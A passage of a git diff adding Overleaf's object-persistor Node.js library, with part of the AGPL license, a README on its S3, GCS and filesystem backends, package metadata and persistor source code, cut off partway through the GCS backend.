"AS IS" WITHOUT WARRANTY +OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, +THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM +IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF +ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + + 16. Limitation of Liability. + + IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS +THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY +GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE +USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF +DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD +PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), +EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF +SUCH DAMAGES. + + 17. Interpretation of Sections 15 and 16. + + If the disclaimer of warranty and limitation of liability provided +above cannot be given local legal effect according to their terms, +reviewing courts shall apply local law that most closely approximates +an absolute waiver of all civil liability in connection with the +Program, unless a warranty or assumption of liability accompanies a +copy of the Program in return for a fee. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +state the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + + Copyright (C) + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU Affero General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU Affero General Public License for more details. + + You should have received a copy of the GNU Affero General Public License + along with this program. If not, see . + +Also add information on how to contact you by electronic and paper mail. + + If your software can interact with users remotely through a computer +network, you should also make sure that it provides a way for users to +get its source. For example, if your program is a web application, its +interface could display a "Source" link that leads users to an archive +of the code. There are many ways you could offer source, and different +solutions will be better for different programs; see section 13 for the +specific requirements. + + You should also get your employer (if you work as a programmer) or school, +if any, to sign a "copyright disclaimer" for the program, if necessary. +For more information on this, and how to apply and follow the GNU AGPL, see +. diff --git a/libraries/object-persistor/README.md b/libraries/object-persistor/README.md new file mode 100644 index 0000000..df9d6a3 --- /dev/null +++ b/libraries/object-persistor/README.md @@ -0,0 +1,314 @@ +# @overleaf/object-persistor + +Stores arbitrary objects in multiple backends, with support for falling back to a secondary backend if the object can't be found in the primary. + +Contains a workaround within the GCS backend to allow lifecycle rules to keep objects for a set period of time from deletion, which can't currently be accomplished with GCS's own rules. (See configuration-specific notes later) + +## Backends available + +- S3 +- GCS +- Filesystem (FS) + +## Getting started + +```JavaScript +// import the module +const ObjectPersistor = require('object-persistor') + +const config = { + // see 'Configuration' section below +} +// create a new persistor +const Persistor = ObjectPersistor(config) +``` + +### Errors + +Errors returned by persistor methods are all derived from `OError` (`@overleaf/o-error`.) To perform `instanceof` checks, you can use the `Errors` object from the persistor module: + +```JavaScript +const ObjectPersistor = require('object-persistor') +const { Errors } = ObjectPersistor +``` + +### Methods + +#### sendStream + +```JavaScript +async function sendStream(bucketName, key, readStream, opts = {}) +``` + +Uploads a stream to the backend. + +- `bucketName`: The name of the bucket to upload to +- `key`: The key for the uploaded object +- `readStream`: The data stream to upload +- `opts` (optional): + - `sourceMd5`: The md5 hash of the source data, if known. The uploaded data will be compared against this and the operation will fail if it does not match. If omitted, the md5 is calculated as the data is uploaded instead, and verified against the backend. + - `contentType`: The content type to write in the object metadata + - `contentEncoding`: The content encoding to write in the object metadata + +##### Notes + +When using a secondary persistor, this method uploads only to the primary. + +If an object already exists at the specified key, it will be overwritten. + +#### getObjectStream + +```JavaScript +async function getObjectStream(bucketName, key, opts = {}) +``` + +Retrieves a stream from the backend, for reading + +- `bucketName`: The name of the bucket to download from +- `key`: The key for the object +- `opts` (optional): + - `start`, `end`: Downloads a byte range from the object. Specify both `start` and `end`. `end` is inclusive. + +##### Returns + +A `stream.Readable` to read the data. + +##### Notes + +When using a secondary persistor, this method will fall back to retrieving the object from the secondary if it does not exist on the primary. + +#### getRedirectUrl + +```JavaScript +async function getRedirectUrl(bucketName, key) +``` + +Gets a signed link directly to the backend, if possible. This can be used to download the data directly, instead of proxying it. + +- `bucketName`: The name of the bucket to download from +- `key`: The key for the object + +##### Returns + +A `string` containing the signed link, or `null` if a link cannot be generated. + +##### Notes + +In the case of `null`, you should fall back to `getObjectStream` as sometimes signed links cannot be generated. + +Do not use this method if you are using a secondary persistor, as this mechanism does not check to see if the object actually exists - so cannot provide a fallback. + +#### getObjectSize + +```JavaScript +async function getObjectSize(bucketName, key) +``` + +Returns the size of the stored data + +- `bucketName`: The name of the bucket to download from +- `key`: The key for the object + +##### Returns + +An integer containing the size, in bytes. + +##### Notes + +When using a secondary persistor this method returns the size from the secondary persistor, if not found on the primary. + +#### getObjectMd5Hash + +```JavaScript +async function getObjectMd5Hash(bucketName, key) +``` + +Returns the MD5 hash of the stored data + +- `bucketName`: The name of the bucket to download from +- `key`: The key for the object + +##### Returns + +A string containing the hex representation of the MD5 hash + +##### Notes + +When using a secondary persistor this method returns the hash from the secondary persistor, if not found on the primary. + +#### deleteFile + +```JavaScript +async function deleteFile(bucketName, key) +``` + +Deletes an object + +- `bucketName`: The name of the bucket to delete from +- `key`: The key for the object + +##### Notes + +When using a secondary persistor, this deletes the object from _both_ persistors. + +#### deleteDirectory + +```JavaScript +async function deleteDirectory(bucketName, key) +``` + +Deletes a directory (all object whose keys start with the supplied `key`) + +- `bucketName`: The name of the bucket to delete from +- `key`: The key prefix for the objects + +##### Notes + +When using a secondary persistor, this deletes the objects from _both_ persistors. + +#### directorySize + +```JavaScript +async function directorySize(bucketName, key) +``` + +Returns the size of a directory (all objects whose keys start with the supplied `key`) + +- `bucketName`: The name of the bucket to examine +- `key`: The key prefix for the objects + +##### Returns + +An integer containing the size, in bytes + +##### Notes + +When using a secondary persistor, this returns the value from the secondary persistor if no objects are found on the primary. + +#### checkIfObjectExists + +```JavaScript +async function checkIfObjectExists(bucketName, key) +``` + +Returns whether an object exists + +- `bucketName`: The name of the bucket to examine +- `key`: The key for the object + +##### Returns + +A boolean representing whether the object exists + +##### Notes + +When using a secondary persistor, returns true if the object exists on either the primary or secondary. + +#### copyObject + +```JavaScript +async function copyObject(bucketName, sourceKey, destKey) +``` + +Copies a object to another key, within a bucket. + +- `bucketName`: The name of the bucket in which to copy the object +- `sourceKey`: The key for the object to be copied +- `destKey`: The key to which the object should be copied + +##### Notes + +Can only copy objects within a single bucket. To copy objects in any other way, pass the stream returned from `getObjectStream` to `sendStream` + +If an object already exists at the specified key, it will be overwritten. + +#### sendFile + +```JavaScript +async function sendFile(bucketName, key, fsPath) +``` + +Uploads a file from the local disk. + +- `bucketName`: The name of the bucket to upload to +- `key`: The key for the uploaded object +- `fsPath`: The path on disk to the file for uploading + +##### Notes + +When using a secondary persistor, this method uploads only to the primary. + +If an object already exists at the specified key, it will be overwritten. + +This method is designed for applications which may write temporary data out to the disk before uploading. + +## Configuration + +An object with the relevant configuration should be passed to the main function returned from the module. The object contains both common and backend-specific parameters. + +### Common parameters + +- `backend` (required): String specifying the primary persistor to use as the storage backend. Must be one of `s3`, `gcs` or `fs`. +- `signedUrlExpiryInMs`: Time before expiry (in milliseconds) of signed URLs + +### FS-specific parameters + +- `useSubdirectories`: If true, files will be stored in subdirectories on the filesystem. By default, the directory structure is flattened and slashes in the object keys are replaced with underscores. + +#### Notes + +For the `FS` persistor, the `bucketName` should be the full path to the folder on disk where the files are stored. + +### S3-specific parameters + +- `s3.key` (required): The AWS access key ID +- `s3.secret` (required): The AWS secret access key +- `s3.partSize`: The part size for S3 uploads. Defaults to 100 megabytes. +- `s3.httpOptions`: HTTP options passed directly to the [S3 constructor](https://docs.aws.amazon.com/AWSJavaScriptSDK/latest/AWS/S3.html#constructor-property). +- `s3.maxRetries`: The number of times the S3 client will retry in case of an error +- `s3.endpoint`: For testing - overrides the S3 endpoint to use a different service (e.g. a fake S3 server) +- `s3.pathStyle`: For testing - use old path-style URLs, for services that do not support subdomain-based access + +- `s3BucketCreds`: A JSON-encoded string specifying different S3 credentials for accessing different buckets, in the following format. These credentials override the default ones configured in the main `s3` settings: + +```json +{ + "bucketName": { + "auth_key": "your aws access key ID", + "auth_secret": "your aws secret access key" + } +} +``` + +#### Notes + +In order for server-side MD5 generation to work, uploads must be below the `partSize`. Otherwise a multipart upload will be used, and the S3 `eTag` which is used to retrieve the MD5 will not be the MD5 hash of the uploaded object. In these cases, we download the data and calculate the MD5 manually. + +For verification during upload, we use S3's checksum mechanism to verify the integrity of the uploaded data, but when explicitly retrieving the md5 hash this will download the entire object if its size is above the part size. + +### GCS-specific parameters + +GCS authentication is configured automatically via the local service account, or the `GOOGLE_APPLICATION_CREDENTIALS` environment variable. + +- `gcs.unlockBeforeDelete`: unlock an event-based hold before deleting. default false (see notes) +- `gcs.deletedBucketSuffix`: if present, copy the object to a bucket with this suffix before deletion (see notes) +- `gcs.deleteConcurrency`: when recursively deleting a directory, the maximum number of delete requests that will be used at once (default 50) +- `gcs.unsignedUrls`: For testing - do not sign GCS download URLs +- `gcs.endpoint.apiEndpoint`: For testing - specify a different GCS endpoint to use +- `gcs.endpoint.projectId`: For testing - the GCS project ID to supply to the overridden backend + +#### Notes + +In order to support deletion after a period, the GCS persistor allows usage of a two-bucket system. The main bucket contains the live objects, and on delete the objects are first copied to a 'deleted' bucket, and then deleted from the main one. The 'deleted' bucket is then expected to have a lifecycle policy applied to delete objects after a set period. + +In order to prevent accidental deletion from outside this mechanism, an event-based-hold can be applied by default on the main bucket. This will be unlocked _after_ the object has been copied to the 'deleted' bucket so that the object can then be deleted from the main bucket. + +## Contributing + +Contributions should pass lint, formatting and unit test checks. To run these, use + +``` +npm run test +``` + +There are no acceptance tests in this module, but https://github.com/overleaf/filestore/ contains a comprehensive set of acceptance tests that use this module. These should also pass, with the changes. diff --git a/libraries/object-persistor/buildscript.txt b/libraries/object-persistor/buildscript.txt new file mode 100644 index 0000000..9ca6929 --- /dev/null +++ b/libraries/object-persistor/buildscript.txt @@ -0,0 +1,10 @@ +object-persistor +--dependencies=None +--docker-repos=gcr.io/overleaf-ops +--env-add= +--env-pass-through= +--esmock-loader=False +--is-library=True +--node-version=20.18.2 +--public-repo=False +--script-version=4.7.0 diff --git a/libraries/object-persistor/index.js b/libraries/object-persistor/index.js new file mode 100644 index 0000000..d459aaa --- /dev/null +++ b/libraries/object-persistor/index.js @@ -0,0 +1,6 @@ +const PersistorFactory = require('./src/PersistorFactory') + +module.exports = function ObjectPersistor(settings) { + return PersistorFactory(settings) +} +module.exports.Errors = require('./src/Errors') diff --git a/libraries/object-persistor/package.json b/libraries/object-persistor/package.json new file mode 100644 index 0000000..2cc70b4 --- /dev/null +++ b/libraries/object-persistor/package.json @@ -0,0 +1,45 @@ +{ + "name": "@overleaf/object-persistor", + "version": "1.0.2", + "description": "Module for storing objects in multiple backends, with fallback on 404 to assist migration between them", + "main": "index.js", + "scripts": { + "test": "npm run lint && npm run format && npm run types:check && npm run test:unit", + "test:unit": "mocha --exit test/**/*.{js,cjs}", + "lint": "eslint --ext .js --ext .cjs --ext .ts --max-warnings 0 --format unix .", + "lint:fix": "eslint --fix --ext .js --ext .cjs --ext .ts .", + "format": "prettier --list-different $PWD/'**/*.{js,cjs,ts}'", + "format:fix": "prettier --write $PWD/'**/*.{js,cjs,ts}'", + "test:ci": "npm run test:unit", + "types:check": "tsc --noEmit" + }, + "repository": { + "type": "git", + "url": "github.com:overleaf/object-persistor" + }, + "author": "Overleaf (https://www.overleaf.com/)", + "license": "AGPL-3.0", + "dependencies": { + "@google-cloud/storage": "^6.10.1", + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/o-error": "*", + "@overleaf/stream-utils": "*", + "aws-sdk": "^2.1691.0", + "fast-crc32c": "overleaf/node-fast-crc32c#aae6b2a4c7a7a159395df9cc6c38dfde702d6f51", + "glob": "^7.1.6", + "range-parser": "^1.2.1", + "tiny-async-pool": "^1.1.0" + }, + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "mock-fs": "^5.2.0", + "mongodb": "6.12.0", + "sandboxed-module": "^2.0.4", + "sinon": "^9.2.4", + "sinon-chai": "^3.7.0", + "typescript": "^5.0.4" + } +} diff --git a/libraries/object-persistor/src/AbstractPersistor.js b/libraries/object-persistor/src/AbstractPersistor.js new file mode 100644 index 0000000..3352766 --- /dev/null +++ b/libraries/object-persistor/src/AbstractPersistor.js @@ -0,0 +1,163 @@ +const { NotImplementedError } = require('./Errors') + +module.exports = class AbstractPersistor { + /** + * @param location + * @param target + * @param {string} source + * @return {Promise} + */ + async sendFile(location, target, source) { + throw new NotImplementedError('method not implemented in persistor', { + method: 'sendFile', + location, + target, + source, + }) + } + + /** + * @param location + * @param target + * @param {NodeJS.ReadableStream} sourceStream + * @param {Object} opts + * @return {Promise} + */ + async sendStream(location, target, sourceStream, opts = {}) { + throw new NotImplementedError('method not implemented in persistor', { + method: 'sendStream', + location, + target, + opts, + }) + } + + /** + * @param location + * @param name + * @param {Object} [opts] + * @param {Number} [opts.start] + * @param {Number} [opts.end] + * @return {Promise} + */ + async getObjectStream(location, name, opts = {}) { + throw new NotImplementedError('method not implemented in persistor', { + method: 'getObjectStream', + location, + name, + opts, + }) + } + + /** + * @param {string} location + * @param {string} name + * @return {Promise} + */ + async getRedirectUrl(location, name) { + throw new NotImplementedError('method not implemented in persistor', { + method: 'getRedirectUrl', + location, + name, + }) + } + + /** + * @param {string} location + * @param {string} name + * @param {Object} opts + * @return {Promise} + */ + async getObjectSize(location, name, opts) { + throw new NotImplementedError('method not implemented in persistor', { + method: 'getObjectSize', + location, + name, + }) + } + + /** + * @param {string} location + * @param {string} name + * @param {Object} opts + * @return {Promise} + */ + async getObjectMd5Hash(location, name, opts) { + throw new NotImplementedError('method not implemented in persistor', { + method: 'getObjectMd5Hash', + location, + name, + }) + } + + /** + * @param {string} location + * @param {string} fromName + * @param {string} toName + * @param {Object} opts + * @return {Promise} + */ + async copyObject(location, fromName, toName, opts) { + throw new NotImplementedError('method not implemented in persistor', { + method: 'copyObject', + location, + fromName, + toName, + }) + } + + /** + * @param {string} location + * @param {string} name + * @return {Promise} + */ + async deleteObject(location, name) { + throw new NotImplementedError('method not implemented in persistor', { + method: 'deleteObject', + location, + name, + }) + } + + /** + * @param {string} location + * @param {string} name + * @param {string} [continuationToken] + * @return {Promise} + */ + async deleteDirectory(location, name, continuationToken) { + throw new NotImplementedError('method not implemented in persistor', { + method: 'deleteDirectory', + location, + name, + }) + } + + /** + * @param {string} location + * @param {string} name + * @param {Object} opts + * @return {Promise} + */ + async checkIfObjectExists(location, name, opts) { + throw new NotImplementedError('method not implemented in persistor', { + method: 'checkIfObjectExists', + location, + name, + }) + } + + /** + * @param {string} location + * @param {string} name + * @param {string} [continuationToken] + * @return {Promise} + */ + async directorySize(location, name, continuationToken) { + throw new NotImplementedError('method not implemented in persistor', { + method: 'directorySize', + location, + name, + }) + } +} diff --git a/libraries/object-persistor/src/Errors.js b/libraries/object-persistor/src/Errors.js new file mode 100644 index 0000000..0c9dd52 --- /dev/null +++ b/libraries/object-persistor/src/Errors.js @@ -0,0 +1,19 @@ +const OError = require('@overleaf/o-error') + +class NotFoundError extends OError {} +class WriteError extends OError {} +class ReadError extends OError {} +class SettingsError extends OError {} +class NotImplementedError extends OError {} +class AlreadyWrittenError extends OError {} +class NoKEKMatchedError extends OError {} + +module.exports = { + NotFoundError, + WriteError, + ReadError, + SettingsError, + NotImplementedError, + AlreadyWrittenError, + NoKEKMatchedError, +} diff --git a/libraries/object-persistor/src/FSPersistor.js b/libraries/object-persistor/src/FSPersistor.js new file mode 100644 index 0000000..01aab72 --- /dev/null +++ b/libraries/object-persistor/src/FSPersistor.js @@ -0,0 +1,330 @@ +const crypto = require('node:crypto') +const fs = require('node:fs') +const fsPromises = require('node:fs/promises') +const globCallbacks = require('glob') +const Path = require('node:path') +const { PassThrough } = require('node:stream') +const { pipeline } = require('node:stream/promises') +const { promisify } = require('node:util') + +const AbstractPersistor = require('./AbstractPersistor') +const { ReadError, WriteError, NotImplementedError } = require('./Errors') +const PersistorHelper = require('./PersistorHelper') + +const glob = promisify(globCallbacks) + +module.exports = class FSPersistor extends AbstractPersistor { + constructor(settings = {}) { + if (settings.storageClass) { + throw new NotImplementedError( + 'FS backend does not support storage classes' + ) + } + + super() + this.useSubdirectories = Boolean(settings.useSubdirectories) + } + + async sendFile(location, target, source) { + // actually copy the file (instead of moving it) to maintain consistent behaviour + // between the different implementations + try { + const sourceStream = fs.createReadStream(source) + await this.sendStream(location, target, sourceStream) + } catch (err) { + throw PersistorHelper.wrapError( + err, + 'failed to copy the specified file', + { location, target, source }, + WriteError + ) + } + } + + async sendStream(location, target, sourceStream, opts = {}) { + if (opts.ifNoneMatch === '*') { + // The standard library only has fs.rename(), which does not support exclusive flags. + // Refuse to act on this write operation. + throw new NotImplementedError( + 'Overwrite protection required by caller, but it is not available is FS backend. Configure GCS or S3 backend instead, get in touch with support for further information.' + ) + } + + const targetPath = this._getFsPath(location, target) + + try { + await this._ensureDirectoryExists(targetPath) + const tempFilePath = await this._writeStreamToTempFile( + location, + sourceStream, + opts + ) + + try { + await fsPromises.rename(tempFilePath, targetPath) + } finally { + await this._cleanupTempFile(tempFilePath) + } + } catch (err) { + throw PersistorHelper.wrapError( + err, + 'failed to write stream', + { location, target, ifNoneMatch: opts.ifNoneMatch }, + WriteError + ) + } + } + + // opts may be {start: Number, end: Number} + async getObjectStream(location, name, opts = {}) { + if (opts.autoGunzip) { + throw new NotImplementedError( + 'opts.autoGunzip is not supported by FS backend. Configure GCS or S3 backend instead, get in touch with support for further information.' + ) + } + const observer = new PersistorHelper.ObserverStream({ + metric: 'fs.ingress', // ingress to us from disk + bucket: location, + }) + const fsPath = this._getFsPath(location, name) + + try { + opts.fd = await fsPromises.open(fsPath, 'r') + } catch (err) { + throw PersistorHelper.wrapError( + err, + 'failed to open file for streaming', + { location, name, fsPath, opts }, + ReadError + ) + } + + const stream = fs.createReadStream(null, opts) + // Return a PassThrough stream with a minimal interface. It will buffer until the caller starts reading. It will emit errors from the source stream (Stream.pipeline passes errors along). + const pass = new PassThrough() + pipeline(stream, observer, pass).catch(() => {}) + return pass + } + + async getRedirectUrl() { + // not implemented + return null + } + + async getObjectSize(location, filename) { + const fsPath = this._getFsPath(location, filename) + + try { + const stat = await fsPromises.stat(fsPath) + return stat.size + } catch (err) { + throw PersistorHelper.wrapError( + err, + 'failed to stat file', + { location, filename }, + ReadError + ) + } + } + + async getObjectMd5Hash(location, filename) { + const fsPath = this._getFsPath(location, filename) + try { + const stream = fs.createReadStream(fsPath) + const hash = await PersistorHelper.calculateStreamMd5(stream) + return hash + } catch (err) { + throw new ReadError( + 'unable to get md5 hash from file', + { location, filename }, + err + ) + } + } + + async copyObject(location, source, target) { + const sourceFsPath = this._getFsPath(location, source) + const targetFsPath = this._getFsPath(location, target) + + try { + await this._ensureDirectoryExists(targetFsPath) + await fsPromises.copyFile(sourceFsPath, targetFsPath) + } catch (err) { + throw PersistorHelper.wrapError( + err, + 'failed to copy file', + { location, source, target, sourceFsPath, targetFsPath }, + WriteError + ) + } + } + + async deleteObject(location, name) { + const fsPath = this._getFsPath(location, name) + try { + // S3 doesn't give us a 404 when a file wasn't there to be deleted, so we + // should be consistent here as well + await fsPromises.rm(fsPath, { force: true }) + } catch (err) { + throw PersistorHelper.wrapError( + err, + 'failed to delete file', + { location, name, fsPath }, + WriteError + ) + } + } + + async deleteDirectory(location, name) { + const fsPath = this._getFsPath(location, name) + + try { + if (this.useSubdirectories) { + await fsPromises.rm(fsPath, { recursive: true, force: true }) + } else { + const files = await this._listDirectory(fsPath) + for (const file of files) { + await fsPromises.rm(file, { force: true }) + } + } + } catch (err) { + throw PersistorHelper.wrapError( + err, + 'failed to delete directory', + { location, name, fsPath }, + WriteError + ) + } + } + + async checkIfObjectExists(location, name) { + const fsPath = this._getFsPath(location, name) + try { + const stat = await fsPromises.stat(fsPath) + return !!stat + } catch (err) { + if (err.code === 'ENOENT') { + return false + } + throw PersistorHelper.wrapError( + err, + 'failed to stat file', + { location, name, fsPath }, + ReadError + ) + } + } + + // note, does not recurse into subdirectories, as we use a flattened directory structure + async directorySize(location, name) { + const fsPath = this._getFsPath(location, name) + let size = 0 + + try { + const files = await this._listDirectory(fsPath) + for (const file of files) { + try { + const stat = await fsPromises.stat(file) + if (stat.isFile()) { + size += stat.size + } + } catch (err) { + // ignore files that may have just been deleted + if (err.code !== 'ENOENT') { + throw err + } + } + } + } catch (err) { + throw PersistorHelper.wrapError( + err, + 'failed to get directory size', + { location, name }, + ReadError + ) + } + + return size + } + + async _writeStreamToTempFile(location, stream, opts = {}) { + const observerOptions = { + metric: 'fs.egress', // egress from us to disk + bucket: location, + } + const observer = new PersistorHelper.ObserverStream(observerOptions) + + const tempDirPath = await fsPromises.mkdtemp(Path.join(location, 'tmp-')) + const tempFilePath = Path.join(tempDirPath, 'uploaded-file') + + const transforms = [observer] + let md5Observer + if (opts.sourceMd5) { + md5Observer = createMd5Observer() + transforms.push(md5Observer.transform) + } + + try { + const writeStream = fs.createWriteStream(tempFilePath) + await pipeline(stream, ...transforms, writeStream) + } catch (err) { + await this._cleanupTempFile(tempFilePath) + throw new WriteError( + 'problem writing temp file locally', + { tempFilePath }, + err + ) + } + + if (opts.sourceMd5) { + const actualMd5 = md5Observer.hash.digest('hex') + if (actualMd5 !== opts.sourceMd5) { + await this._cleanupTempFile(tempFilePath) + throw new WriteError('md5 hash mismatch', { + expectedMd5: opts.sourceMd5, + actualMd5, + }) + } + } + + return tempFilePath + } + + async _cleanupTempFile(tempFilePath) { + const dirPath = Path.dirname(tempFilePath) + await fsPromises.rm(dirPath, { force: true, recursive: true }) + } + + _getFsPath(location, key) { + key = key.replace(/\/$/, '') + if (!this.useSubdirectories) { + key = key.replace(/\//g, '_') + } + return Path.join(location, key) + } + + async _listDirectory(path) { + if (this.useSubdirectories) { + return await glob(Path.join(path, '**')) + } else { + return await glob(`${path}_*`) + } + } + + async _ensureDirectoryExists(path) { + await fsPromises.mkdir(Path.dirname(path), { recursive: true }) + } +} + +function createMd5Observer() { + const hash = crypto.createHash('md5') + + async function* transform(chunks) { + for await (const chunk of chunks) { + hash.update(chunk) + yield chunk + } + } + + return { hash, transform } +} diff --git a/libraries/object-persistor/src/GcsPersistor.js b/libraries/object-persistor/src/GcsPersistor.js new file mode 100644 index 0000000..0485373 --- /dev/null +++ b/libraries/object-persistor/src/GcsPersistor.js @@ -0,0 +1,354 @@ +const fs = require('node:fs') +const { pipeline } = require('node:stream/promises') +const { PassThrough } = require('node:stream') +const { Storage, IdempotencyStrategy } = require('@google-cloud/storage') +const { + WriteError, + ReadError, + NotFoundError, + NotImplementedError, +} = require('./Errors') +const asyncPool = require('tiny-async-pool') +const AbstractPersistor = require('./AbstractPersistor') +const PersistorHelper = require('./PersistorHelper') +const Logger = require('@overleaf/logger') +const zlib = require('node:zlib') + +module.exports = class GcsPersistor extends AbstractPersistor { + constructor(settings) { + if (settings.storageClass) { + throw new NotImplementedError( + 'Use default bucket class for GCS instead of settings.storageClass' + ) + } + + super() + this.settings = settings + + // endpoint settings will be null by default except for tests + // that's OK - GCS uses the locally-configured service account by default + const storageOptions = {} + if (this.settings.endpoint) { + storageOptions.projectId = this.settings.endpoint.projectId + storageOptions.apiEndpoint = this.settings.endpoint.apiEndpoint + } + storageOptions.retryOptions = { ...this.settings.retryOptions } + if (storageOptions.retryOptions) { + if (storageOptions.retryOptions.idempotencyStrategy) { + const value = + IdempotencyStrategy[this.settings.retryOptions.idempotencyStrategy] + if (value === undefined) { + throw new Error( + 'Unrecognised value for retryOptions.idempotencyStrategy' + ) + } + Logger.info( + `Setting retryOptions.idempotencyStrategy to ${storageOptions.retryOptions.idempotencyStrategy} (${value})` + ) + storageOptions.retryOptions.idempotencyStrategy = value + } + } + + this.storage = new Storage(storageOptions) + } + + async sendFile(bucketName, key, fsPath) { + return await this.sendStream(bucketName, key, fs.createReadStream(fsPath)) + } + + async sendStream(bucketName, key, readStream, opts = {}) { + try { + const observeOptions = { + metric: 'gcs.egress', // egress from us to GCS + bucket: bucketName, + } + + let sourceMd5 = opts.sourceMd5 + if (!sourceMd5) { + // if there is no supplied md5 hash, we calculate the hash as the data passes through + observeOptions.hash = 'md5' + } + + const observer = new PersistorHelper.ObserverStream(observeOptions) + + const writeOptions = { + // disabling of resumable uploads is recommended by Google: + resumable: false, + } + + if (sourceMd5) { + writeOptions.validation = 'md5' + writeOptions.metadata = writeOptions.metadata || {} + writeOptions.metadata.md5Hash = PersistorHelper.hexToBase64(sourceMd5) + } + if (opts.contentType) { + writeOptions.metadata = writeOptions.metadata || {} + writeOptions.metadata.contentType = opts.contentType + } + if (opts.contentEncoding) { + writeOptions.metadata = writeOptions.metadata || {} + writeOptions.metadata.contentEncoding = opts.contentEncoding + } + const fileOptions = {} + if (opts.ifNoneMatch === '*') { + fileOptions.generation = 0 + } + + const uploadStream = this.storage + .bucket(bucketName) + .file(key, fileOptions) + .createWriteStream(writeOptions) + + await pipeline(readStream, observer, uploadStream) + + // if we didn't have an md5 hash, we should compare our computed one with Google's + // as we couldn't tell GCS about it beforehand + if (!sourceMd5) { + sourceMd5 = observer.getHash() + // throws on mismatch + await PersistorHelper.verifyMd5(this, bucketName, key, sourceMd5) + } + } catch (err) { + throw PersistorHelper.wrapError( + err, + 'upload to GCS failed', + { bucketName, key, ifNoneMatch: opts.ifNoneMatch }, + WriteError + ) + } + } + + async getObjectStream(bucketName, key, opts = {}) { + const observer = new PersistorHelper.ObserverStream({ + metric: 'gcs.ingress', // ingress to us from GCS + bucket: bucketName, + }) + const stream = this.storage + .bucket(bucketName) + .file(key) + .createReadStream({ decompress: false, ...opts }) + + let contentEncoding + try { + await new Promise((resolve, reject) => { + stream.on('response', res => { + switch (res.statusCode) { + case 200: // full response + case 206: // partial response + contentEncoding = res.headers['content-encoding'] + return resolve() + case 404: + return reject(new NotFoundError()) + default: + return reject(new Error('non success status: ' + res.statusCode)) + } + }) + stream.on('error', reject) + stream.read(0) // kick off request + }) + } catch (err) { + throw PersistorHelper.wrapError( + err, + 'error reading file from GCS', + { bucketName, key, opts }, + ReadError + ) + } + // Return a PassThrough stream with a minimal interface. It will buffer until the caller starts reading. It will emit errors from the source stream (Stream.pipeline passes errors along). + const pass = new PassThrough() + const transformer = [] + if (contentEncoding === 'gzip' && opts.autoGunzip) { + transformer.push(zlib.createGunzip()) + } + pipeline(stream, observer, ...transformer, pass).catch(() => {}) + return pass + } + + async getRedirectUrl(bucketName, key) { + if (this.settings.unsignedUrls) { + // Construct a direct URL to the object download endpoint + // (see https://cloud.google.com/storage/docs/request-endpoints#json-api) + const apiEndpoint = + this.settings.endpoint.apiEndpoint || 'https://storage.googleapis.com' + return `${apiEndpoint}/download/storage/v1/b/${bucketName}/o/${key}?alt=media` + } + try { + const [url] = await this.storage + .bucket(bucketName) + .file(key) + .getSignedUrl({ + action: 'read', + expires: Date.now() + this.settings.signedUrlExpiryInMs, + }) + return url + } catch (err) { + throw PersistorHelper.wrapError( + err, + 'error generating signed url for GCS file', + { bucketName, key }, + ReadError + ) + } + } + + async getObjectSize(bucketName, key) { + try { + const [metadata] = await this.storage + .bucket(bucketName) + .file(key) + .getMetadata() + return parseInt(metadata.size, 10) + } catch (err) { + throw PersistorHelper.wrapError( + err, + 'error getting size of GCS object', + { bucketName, key }, + ReadError + ) + } + } + + async getObjectMd5Hash(bucketName, key) { + try { + const [metadata] = await this.storage + .bucket(bucketName) + .file(key) + .getMetadata() + return PersistorHelper.base64ToHex(metadata.md5Hash) + } catch (err) { + throw PersistorHelper.wrapError( + err, + 'error getting hash of GCS object', + { bucketName, key }, + ReadError + ) + } + } + + async deleteObject(bucketName, key) { + try { + const file = this.storage.bucket(bucketName).file(key) + + if (this.settings.deletedBucketSuffix) { + await file.copy( + this.storage + .bucket(`${bucketName}${this.settings.deletedBucketSuffix}`) + .file(`${key}-${new Date().toISOString()}`) + ) + } + if (this.settings.unlockBeforeDelete) { + await file.setMetadata({ eventBasedHold: false }) + } + await file.delete() + } catch (err) { + // ignore 404s: it's fine if the file doesn't exist. + if (err.code === 404) { + return + } + throw PersistorHelper.wrapError( + err, + 'error deleting GCS object', + { bucketName, key }, + WriteError + ) + } + } + + async deleteDirectory(bucketName, key) { + const prefix = ensurePrefixIsDirectory(key) + let query = { prefix, autoPaginate: false } + do { + try { + const [files, nextQuery] = await this.storage + .bucket(bucketName) + .getFiles(query) + // iterate over paginated results using the nextQuery returned by getFiles + query = nextQuery + if (Array.isArray(files) && files.length > 0) { + await asyncPool( + this.settings.deleteConcurrency, + files, + async file => { + await this.deleteObject(bucketName, file.name) + } + ) + } + } catch (err) { + const error = PersistorHelper.wrapError( + err, + 'failed to delete directory in GCS', + { bucketName, key }, + WriteError + 